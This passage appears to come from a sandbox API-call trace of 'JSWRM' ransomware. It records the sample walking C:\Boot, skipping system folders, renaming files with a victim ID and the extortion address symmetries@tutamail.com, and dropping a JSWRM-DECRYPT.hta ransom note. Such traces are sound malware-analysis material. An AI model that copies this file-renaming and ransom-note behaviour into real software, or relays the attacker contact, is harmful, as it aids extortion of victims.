ftCreationTime.dwLowDateTime=0x1d0a1367, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1d0a1367, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1d0a1367, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0064.392] FindClose (in: hFindFile=0x231c40 | out: hFindFile=0x231c40) returned 1 [0064.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0064.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0064.393] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef6c9427, ftCreationTime.dwHighDateTime=0x1d3273d, ftLastAccessTime.dwLowDateTime=0xef6c9427, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1236, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="updaterevokesipolicy.p7b", cAlternateFileName="UPDATE~1.P7B")) returned 1 [0064.393] lstrcmpiW (lpString1="updaterevokesipolicy.p7b", lpString2=".") returned 1 [0064.393] lstrcmpiW (lpString1="updaterevokesipolicy.p7b", lpString2="..") returned 1 [0064.393] lstrcmpiW (lpString1="updaterevokesipolicy.p7b", lpString2="...") returned 1 [0064.393] lstrcmpiW (lpString1="updaterevokesipolicy.p7b", lpString2="windows") returned -1 [0064.393] lstrcmpiW (lpString1="updaterevokesipolicy.p7b", lpString2="recovery") returned 1 [0064.393] lstrcmpiW (lpString1="updaterevokesipolicy.p7b", lpString2="perflogs") returned 1 [0064.393] lstrcmpiW (lpString1="updaterevokesipolicy.p7b", lpString2="documents and settings") returned 1 [0064.393] lstrcmpiW (lpString1="updaterevokesipolicy.p7b", lpString2="$RECYCLE.BIN") returned 1 [0064.393] lstrcmpiW (lpString1="updaterevokesipolicy.p7b", lpString2="system volume information") returned 1 [0064.393] lstrcmpiW (lpString1="updaterevokesipolicy.p7b", lpString2="msocache") returned 1 [0064.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updaterevokesipolicy.p7b", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0064.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0064.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updaterevokesipolicy.p7b", cchWideChar=24, lpMultiByteStr=0x2413a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="updaterevokesipolicy.p7b", lpUsedDefaultChar=0x0) returned 24 [0064.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updaterevokesipolicy.p7b", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0064.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0064.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updaterevokesipolicy.p7b", cchWideChar=24, lpMultiByteStr=0x241290, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="updaterevokesipolicy.p7b", lpUsedDefaultChar=0x0) returned 24 [0064.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0064.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0064.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0064.393] CreateFileW (lpFileName="C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.395] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=9782458033816448) returned 0 [0064.395] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.395] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f63c*=0x0, lpOverlapped=0x0) returned 0 [0064.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.396] CloseHandle (hObject=0xffffffff) returned 1 [0064.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0064.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0064.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0064.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0064.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226430 [0064.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0064.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0064.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226430 | out: hHeap=0x1e0000) returned 1 [0064.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.396] MoveFileW (lpExistingFileName="C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b"), lpNewFileName="C:\\Boot\\updaterevokesipolicy.p7b.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\updaterevokesipolicy.p7b.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0064.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0064.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0064.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0064.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0064.397] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207100, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6d7e9a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0064.397] lstrcmpiW (lpString1="zh-CN", lpString2=".") returned 1 [0064.397] lstrcmpiW (lpString1="zh-CN", lpString2="..") returned 1 [0064.397] lstrcmpiW (lpString1="zh-CN", lpString2="...") returned 1 [0064.397] lstrcmpiW (lpString1="zh-CN", lpString2="windows") returned 1 [0064.397] lstrcmpiW (lpString1="zh-CN", lpString2="recovery") returned 1 [0064.397] lstrcmpiW (lpString1="zh-CN", lpString2="perflogs") returned 1 [0064.397] lstrcmpiW (lpString1="zh-CN", lpString2="documents and settings") returned 1 [0064.397] lstrcmpiW (lpString1="zh-CN", lpString2="$RECYCLE.BIN") returned 1 [0064.397] lstrcmpiW (lpString1="zh-CN", lpString2="system volume information") returned 1 [0064.397] lstrcmpiW (lpString1="zh-CN", lpString2="msocache") returned 1 [0064.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0064.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0064.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0064.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2374e8 [0064.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.397] GetFileAttributesW (lpFileName="C:\\Boot\\zh-CN\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\zh-cn\\jswrm-decrypt.hta")) returned 0xffffffff [0064.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2374e8 | out: hHeap=0x1e0000) returned 1 [0064.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0064.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0064.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0064.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0064.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0064.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237448 [0064.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.458] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\zh-cn\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0064.459] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.459] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0064.460] CloseHandle (hObject=0x450) returned 1 [0064.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237448 | out: hHeap=0x1e0000) returned 1 [0064.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0064.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0064.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0064.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0064.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236c78 [0064.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.460] GetFileAttributesW (lpFileName="C:\\Boot\\zh-CN\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\zh-cn\\jswrm-decrypt.hta")) returned 0x20 [0064.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236c78 | out: hHeap=0x1e0000) returned 1 [0064.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0064.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.461] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207100, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1d15ff3f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x232040 [0064.461] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.461] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207100, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1d15ff3f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.461] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.461] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.461] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0064.461] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0064.461] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0064.461] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0064.461] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0064.461] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0064.461] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0064.461] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0064.461] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.461] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0064.461] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0064.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0064.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0064.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0064.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0064.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.462] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.462] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9257990987244136) returned 0 [0064.462] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.462] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.462] CloseHandle (hObject=0xffffffff) returned 1 [0064.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0064.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0064.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0064.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226930 [0064.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0064.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0064.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226930 | out: hHeap=0x1e0000) returned 1 [0064.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.463] MoveFileW (lpExistingFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0064.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.463] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d15ff3f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1d15ff3f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1d15ff3f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0064.463] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0064.463] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0064.463] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0064.463] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0064.463] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0064.463] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0064.463] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0064.463] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0064.463] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0064.463] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0064.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0064.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 